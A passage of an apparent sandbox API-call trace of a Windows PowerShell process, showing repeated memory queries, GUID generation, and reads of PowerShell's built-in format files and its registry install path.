lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.652] 
VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.652] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.652] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.653] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x39306952, Data2=0x681, Data3=0x4695, Data4=([0]=0x9b, [1]=0x7f, [2]=0xe3, [3]=0xc5, [4]=0x60, [5]=0x6e, [6]=0x90, [7]=0x4a))) returned 0x0 [0135.653] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x38bc70f4, Data2=0xd3f9, Data3=0x4e9b, Data4=([0]=0x82, [1]=0x2a, [2]=0x33, [3]=0x0, [4]=0xae, [5]=0x18, [6]=0xe7, [7]=0x6f))) returned 0x0 [0135.653] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x133202bb, Data2=0x9d0d, Data3=0x4b34, Data4=([0]=0xb6, [1]=0x2e, [2]=0x21, [3]=0xb, [4]=0xab, [5]=0x34, [6]=0x57, [7]=0x97))) returned 0x0 [0135.653] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xf6c8f465, Data2=0x4f56, Data3=0x4db6, Data4=([0]=0xaa, [1]=0xee, [2]=0xee, [3]=0x7, [4]=0xfd, [5]=0x15, [6]=0x7c, [7]=0x26))) returned 0x0 [0135.654] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xf9a56498, Data2=0x31ae, Data3=0x4cd0, Data4=([0]=0x95, [1]=0x28, [2]=0xce, [3]=0x2d, [4]=0x5e, [5]=0x80, [6]=0xb2, [7]=0xf6))) returned 0x0 [0135.654] VirtualQuery (in: lpAddress=0xcb850, lpBuffer=0xcc710, 
dwLength=0x30 | out: lpBuffer=0xcc710*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.654] VirtualQuery (in: lpAddress=0xcb8e0, lpBuffer=0xcc7a0, dwLength=0x30 | out: lpBuffer=0xcc7a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0135.654] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xb74900d9, Data2=0xffa4, Data3=0x43e5, Data4=([0]=0xb1, [1]=0x59, [2]=0x1e, [3]=0xcb, [4]=0x69, [5]=0x4, [6]=0xdb, [7]=0xae))) returned 0x0 [0135.654] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x6af2127a, Data2=0x91fa, Data3=0x4b60, Data4=([0]=0xb4, [1]=0x5, [2]=0x87, [3]=0x8a, [4]=0x89, [5]=0x4, [6]=0x14, [7]=0x7c))) returned 0x0 [0135.655] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xc8878b19, Data2=0x776f, Data3=0x47d2, Data4=([0]=0x97, [1]=0x13, [2]=0x71, [3]=0x12, [4]=0xe, [5]=0x4b, [6]=0xff, [7]=0x82))) returned 0x0 [0135.655] SetErrorMode (uMode=0x1) returned 0x1 [0135.655] SetErrorMode (uMode=0x1) returned 0x1 [0135.655] GetFileType (hFile=0x304) returned 0x1 [0135.655] ReadFile (in: hFile=0x304, lpBuffer=0x33daf50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33daf50*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.661] SetErrorMode (uMode=0x1) returned 0x1 [0135.661] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccfe0 | out: lpFileInformation=0xccfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, 
ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0135.661] SetErrorMode (uMode=0x1) returned 0x1 [0135.661] CoTaskMemAlloc (cb=0x5a) returned 0x1bd970 [0135.661] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd01c, lpData=0x1bd970, lpcbData=0xcd018*=0x56 | out: lpType=0xcd01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd018*=0x56) returned 0x0 [0135.662] CoTaskMemFree (pv=0x1bd970) [0135.667] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x4a6551d5, Data2=0x74cf, Data3=0x4e2d, Data4=([0]=0xa4, [1]=0xed, [2]=0x5e, [3]=0x76, [4]=0x45, [5]=0x80, [6]=0x3f, [7]=0x4))) returned 0x0 [0135.667] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x6a12d9df, Data2=0xee33, Data3=0x49bf, Data4=([0]=0xa8, [1]=0xea, [2]=0x57, [3]=0xdc, [4]=0xba, [5]=0xa8, [6]=0x77, [7]=0x26))) returned 0x0 [0135.667] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x14390518, Data2=0x2de0, Data3=0x48a2, Data4=([0]=0x9b, [1]=0x56, [2]=0xd6, [3]=0xf0, [4]=0xb, [5]=0xc3, [6]=0x6a, [7]=0xb7))) returned 0x0 [0135.667] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x88acc1bf, Data2=0xbc2c, Data3=0x48a3, Data4=([0]=0xa0, [1]=0x3, [2]=0xb4, [3]=0x28, [4]=0x12, [5]=0xf9, [6]=0x90, [7]=0x90))) returned 0x0 [0135.667] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x696ff25c, Data2=0x6599, Data3=0x4369, Data4=([0]=0xa9, [1]=0xb7, [2]=0x64, [3]=0xfb, [4]=0x56, [5]=0x59, [6]=0x4d, [7]=0x78))) returned 0x0 [0135.667] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x8df64fba, Data2=0xcf30, Data3=0x4d5f, Data4=([0]=0x89, [1]=0x5b, [2]=0x31, [3]=0xaf, [4]=0x2d, [5]=0xc3, [6]=0xa, [7]=0xa2))) returned 0x0 [0135.668] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x903d8b98, 
Data2=0xaeac, Data3=0x415e, Data4=([0]=0x93, [1]=0xdc, [2]=0x60, [3]=0x83, [4]=0x70, [5]=0x8d, [6]=0x12, [7]=0x9b))) returned 0x0 [0135.668] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.668] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xa7a8402a, Data2=0xa1d2, Data3=0x4c14, Data4=([0]=0xb0, [1]=0x6e, [2]=0xe1, [3]=0x5c, [4]=0x12, [5]=0xdf, [6]=0x1e, [7]=0x92))) returned 0x0 [0135.668] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x6ad57166, Data2=0x183c, Data3=0x4d50, Data4=([0]=0xa9, [1]=0x70, [2]=0x8b, [3]=0xee, [4]=0x73, [5]=0x16, [6]=0x8e, [7]=0xfe))) returned 0x0 [0135.668] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x7dda8b18, Data2=0x794c, Data3=0x4b46, Data4=([0]=0x8f, [1]=0x0, [2]=0x82, [3]=0x78, [4]=0xf, [5]=0xf2, [6]=0xd0, [7]=0xd6))) returned 0x0 [0135.668] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x3dc73d0a, Data2=0x5e4d, Data3=0x4f10, Data4=([0]=0x95, [1]=0xd2, [2]=0x75, [3]=0xb3, [4]=0xf8, [5]=0x53, [6]=0x11, [7]=0xed))) returned 0x0 [0135.669] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x4548fe0e, Data2=0x364a, Data3=0x4900, Data4=([0]=0xbc, [1]=0x39, [2]=0xb5, [3]=0x12, [4]=0xa6, [5]=0x31, [6]=0xe, [7]=0xca))) returned 0x0 [0135.669] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x7a60f5e3, Data2=0xcb61, Data3=0x4951, Data4=([0]=0xa2, [1]=0x7a, [2]=0x1e, [3]=0xe0, [4]=0xe6, [5]=0x45, [6]=0x2f, [7]=0x24))) returned 0x0 [0135.669] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x4813cf71, Data2=0x155c, Data3=0x4ae4, Data4=([0]=0xa9, [1]=0xf2, [2]=0xb8, [3]=0xa0, [4]=0x8f, [5]=0x91, [6]=0xa5, [7]=0xc5))) returned 0x0 [0135.669] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xb14c81d9, 
Data2=0x12df, Data3=0x4b2b, Data4=([0]=0x91, [1]=0xcd, [2]=0x40, [3]=0xed, [4]=0x9c, [5]=0xea, [6]=0xdd, [7]=0x19))) returned 0x0 [0135.669] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xdae8d023, Data2=0x37f4, Data3=0x42e3, Data4=([0]=0xa3, [1]=0x4f, [2]=0x2b, [3]=0xe5, [4]=0xc, [5]=0x9b, [6]=0x9e, [7]=0x8e))) returned 0x0 [0135.669] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xcb391ab4, Data2=0xac4e, Data3=0x4170, Data4=([0]=0xa2, [1]=0x67, [2]=0x60, [3]=0xc4, [4]=0xf9, [5]=0x5d, [6]=0x32, [7]=0x7))) returned 0x0 [0135.670] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xb0416922, Data2=0xfbb4, Data3=0x4587, Data4=([0]=0xaf, [1]=0xbd, [2]=0x28, [3]=0xef, [4]=0x20, [5]=0x11, [6]=0xa4, [7]=0x66))) returned 0x0 [0135.670] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xa1c26a52, Data2=0x12dd, Data3=0x4fb9, Data4=([0]=0x8a, [1]=0x12, [2]=0xa8, [3]=0xc2, [4]=0x19, [5]=0x1b, [6]=0x29, [7]=0x4a))) returned 0x0 [0135.670] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.670] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.670] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.671] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x1bf4e27, Data2=0xe5a1, Data3=0x4824, Data4=([0]=0xb9, [1]=0x7b, [2]=0x15, 
[3]=0x24, [4]=0x50, [5]=0xdf, [6]=0x75, [7]=0x8c))) returned 0x0 [0135.671] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xdeb1a19b, Data2=0xe9e1, Data3=0x4944, Data4=([0]=0xb5, [1]=0xaf, [2]=0x3e, [3]=0xf2, [4]=0x60, [5]=0xef, [6]=0x30, [7]=0x85))) returned 0x0 [0135.671] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x1c3f1c81, Data2=0xfb97, Data3=0x40e9, Data4=([0]=0x96, [1]=0xea, [2]=0x69, [3]=0xc5, [4]=0xa5, [5]=0x87, [6]=0x7a, [7]=0x6e))) returned 0x0 [0135.671] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xf77a701a, Data2=0x3364, Data3=0x4257, Data4=([0]=0xa5, [1]=0x4f, [2]=0xf3, [3]=0x3c, [4]=0xb4, [5]=0x8a, [6]=0xa2, [7]=0x1c))) returned 0x0 [0135.671] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x67430acd, Data2=0x6528, Data3=0x4a9a, Data4=([0]=0x91, [1]=0xbb, [2]=0x4c, [3]=0xf8, [4]=0xc7, [5]=0xb6, [6]=0x2, [7]=0xe0))) returned 0x0 [0135.672] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xeafbc58b, Data2=0xbc1c, Data3=0x4114, Data4=([0]=0x9e, [1]=0x46, [2]=0x2a, [3]=0xc1, [4]=0xd2, [5]=0x1d, [6]=0x95, [7]=0xee))) returned 0x0 [0135.672] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x3faa51ee, Data2=0x7562, Data3=0x4c6e, Data4=([0]=0x91, [1]=0xb4, [2]=0x12, [3]=0xab, [4]=0x85, [5]=0xe, [6]=0x6f, [7]=0x3a))) returned 0x0 [0135.672] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xdfa03367, Data2=0x451e, Data3=0x411c, Data4=([0]=0xb6, [1]=0x31, [2]=0xbf, [3]=0x6f, [4]=0xd4, [5]=0xa, [6]=0x7e, [7]=0x8c))) returned 0x0 [0135.672] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xfff4dcd5, Data2=0x3ddd, Data3=0x4b26, Data4=([0]=0xbc, [1]=0xa4, [2]=0x5f, [3]=0x27, [4]=0x7, [5]=0xe7, [6]=0x5e, [7]=0xbc))) returned 0x0 [0135.672] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x170721c1, Data2=0xb62f, Data3=0x41a8, Data4=([0]=0x8b, [1]=0xb3, [2]=0xec, [3]=0x23, [4]=0x78, [5]=0x0, [6]=0x75, [7]=0x51))) returned 0x0 [0135.672] 
CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xc07c29f1, Data2=0x6d35, Data3=0x49d0, Data4=([0]=0x8a, [1]=0x56, [2]=0x1e, [3]=0x6d, [4]=0x41, [5]=0x17, [6]=0x39, [7]=0xb4))) returned 0x0 [0135.673] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xec09a337, Data2=0x1fc3, Data3=0x4233, Data4=([0]=0xbb, [1]=0x88, [2]=0xc2, [3]=0x79, [4]=0x0, [5]=0xab, [6]=0xc7, [7]=0x3))) returned 0x0 [0135.673] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x8960ee93, Data2=0x29cf, Data3=0x432e, Data4=([0]=0x82, [1]=0xcf, [2]=0x4c, [3]=0x5d, [4]=0x3f, [5]=0x4d, [6]=0xd4, [7]=0x37))) returned 0x0 [0135.673] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.673] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x80f2f23d, Data2=0xf804, Data3=0x4cba, Data4=([0]=0xb5, [1]=0xbe, [2]=0xce, [3]=0x8e, [4]=0x55, [5]=0xfb, [6]=0x62, [7]=0x9f))) returned 0x0 [0135.673] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.674] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.675] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x84956ae3, Data2=0xa22e, Data3=0x4e23, Data4=([0]=0xa1, [1]=0x83, [2]=0xa5, [3]=0xdd, [4]=0x63, [5]=0x36, [6]=0x0, [7]=0x14))) returned 0x0 [0135.675] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, 
dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.676] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xc9720bd1, Data2=0xe47, Data3=0x49fe, Data4=([0]=0xb0, [1]=0x5a, [2]=0xc8, [3]=0x6, [4]=0x6c, [5]=0xb, [6]=0xba, [7]=0x31))) returned 0x0 [0135.676] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x4868e89c, Data2=0x2076, Data3=0x466f, Data4=([0]=0xa1, [1]=0x98, [2]=0xc9, [3]=0xc1, [4]=0x2, [5]=0xe0, [6]=0xb, [7]=0x8d))) returned 0x0 [0135.676] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xd2720d46, Data2=0x7a1b, Data3=0x4446, Data4=([0]=0x98, [1]=0x84, [2]=0x3a, [3]=0x79, [4]=0xd9, [5]=0x8e, [6]=0xa2, [7]=0xa2))) returned 0x0 [0135.676] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xe6303f69, Data2=0x4a16, Data3=0x4961, Data4=([0]=0x8e, [1]=0xe4, [2]=0x76, [3]=0x32, [4]=0x6d, [5]=0xdb, [6]=0x20, [7]=0x18))) returned 0x0 [0135.676] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xc9f0162f, Data2=0x18b7, Data3=0x45da, Data4=([0]=0x87, [1]=0x6a, [2]=0x3b, [3]=0x57, [4]=0xf2, [5]=0xd2, [6]=0xce, [7]=0x42))) returned 0x0 [0135.677] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x3f0a2156, Data2=0xa791, Data3=0x49fb, Data4=([0]=0x8a, [1]=0x9a, [2]=0xa9, [3]=0xa7, [4]=0x4a, [5]=0xe6, [6]=0x5c, [7]=0xe2))) returned 0x0 [0135.677] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xdc338947, Data2=0x69e, Data3=0x48dc, Data4=([0]=0x9c, [1]=0xdf, [2]=0xe9, [3]=0x4f, [4]=0xc9, [5]=0xfb, [6]=0xe3, [7]=0xca))) returned 0x0 [0135.677] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 
0x30 [0135.677] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x241f3437, Data2=0x5823, Data3=0x4b4f, Data4=([0]=0xbe, [1]=0xcd, [2]=0x6a, [3]=0x91, [4]=0x64, [5]=0xdc, [6]=0x52, [7]=0x97))) returned 0x0 [0135.677] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xee695649, Data2=0x414c, Data3=0x459c, Data4=([0]=0xab, [1]=0xc5, [2]=0x25, [3]=0xf0, [4]=0x9e, [5]=0x5a, [6]=0xda, [7]=0xa5))) returned 0x0 [0135.677] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x51bd9a7, Data2=0x333e, Data3=0x49ad, Data4=([0]=0x96, [1]=0x37, [2]=0x8f, [3]=0x8f, [4]=0x7c, [5]=0x8f, [6]=0xd9, [7]=0x47))) returned 0x0 [0135.678] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x7afea025, Data2=0x3270, Data3=0x430d, Data4=([0]=0xbe, [1]=0x4d, [2]=0x3c, [3]=0xef, [4]=0x94, [5]=0xaa, [6]=0xf5, [7]=0xb1))) returned 0x0 [0135.678] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x384137cc, Data2=0x7cd6, Data3=0x4eba, Data4=([0]=0x9d, [1]=0x72, [2]=0x87, [3]=0x91, [4]=0x5e, [5]=0x83, [6]=0x1c, [7]=0xb7))) returned 0x0 [0135.678] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.678] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x354eb0cb, Data2=0xe3db, Data3=0x4cf1, Data4=([0]=0xb6, [1]=0x2a, [2]=0x26, [3]=0x59, [4]=0xe9, [5]=0xc9, [6]=0xd6, [7]=0x87))) returned 0x0 [0135.678] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x8aedee59, Data2=0xd93d, Data3=0x443a, Data4=([0]=0xb1, [1]=0x3a, [2]=0x79, [3]=0x6a, [4]=0x69, [5]=0xcf, [6]=0xc8, [7]=0x6d))) returned 0x0 [0135.678] VirtualQuery (in: lpAddress=0xcbd10, lpBuffer=0xccbd0, dwLength=0x30 | out: lpBuffer=0xccbd0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, 
RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.679] VirtualQuery (in: lpAddress=0xcbd10, lpBuffer=0xccbd0, dwLength=0x30 | out: lpBuffer=0xccbd0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.679] VirtualQuery (in: lpAddress=0xcbd10, lpBuffer=0xccbd0, dwLength=0x30 | out: lpBuffer=0xccbd0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.679] VirtualQuery (in: lpAddress=0xcbd10, lpBuffer=0xccbd0, dwLength=0x30 | out: lpBuffer=0xccbd0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.679] SetErrorMode (uMode=0x1) returned 0x1 [0135.679] SetErrorMode (uMode=0x1) returned 0x1 [0135.679] GetFileType (hFile=0x304) returned 0x1 [0135.679] ReadFile (in: hFile=0x304, lpBuffer=0x3538f30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x3538f30*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.686] SetErrorMode (uMode=0x1) returned 0x1 [0135.686] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccfe0 | out: lpFileInformation=0xccfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, 
nFileSizeLow=0x48b4)) returned 1 [0135.687] SetErrorMode (uMode=0x1) returned 0x1 [0135.687] CoTaskMemAlloc (cb=0x5a) returned 0x1bd970 [0135.687] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd01c, lpData=0x1bd970, lpcbData=0xcd018*=0x56 | out: lpType=0xcd01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd018*=0x56) returned 0x0 [0135.687] CoTaskMemFree (pv=0x1bd970) [0135.687] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xa2d10016, Data2=0x16b8, Data3=0x4421, Data4=([0]=0xaf, [1]=0xc9, [2]=0x6e, [3]=0x53, [4]=0xa6, [5]=0x66, [6]=0xb1, [7]=0xb8))) returned 0x0 [0135.688] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x6ea4a5b3, Data2=0xfa66, Data3=0x4b3f, Data4=([0]=0x8b, [1]=0x9e, [2]=0x5e, [3]=0x90, [4]=0x7d, [5]=0xc0, [6]=0x26, [7]=0xc4))) returned 0x0 [0135.688] SetErrorMode (uMode=0x1) returned 0x1 [0135.688] SetErrorMode (uMode=0x1) returned 0x1 [0135.688] GetFileType (hFile=0x304) returned 0x1 [0135.688] ReadFile (in: hFile=0x304, lpBuffer=0x3576d18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x3576d18*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.708] SetErrorMode (uMode=0x1) returned 0x1 [0135.708] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccfe0 | out: lpFileInformation=0xccfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0135.708] SetErrorMode (uMode=0x1) returned 0x1 [0135.709] 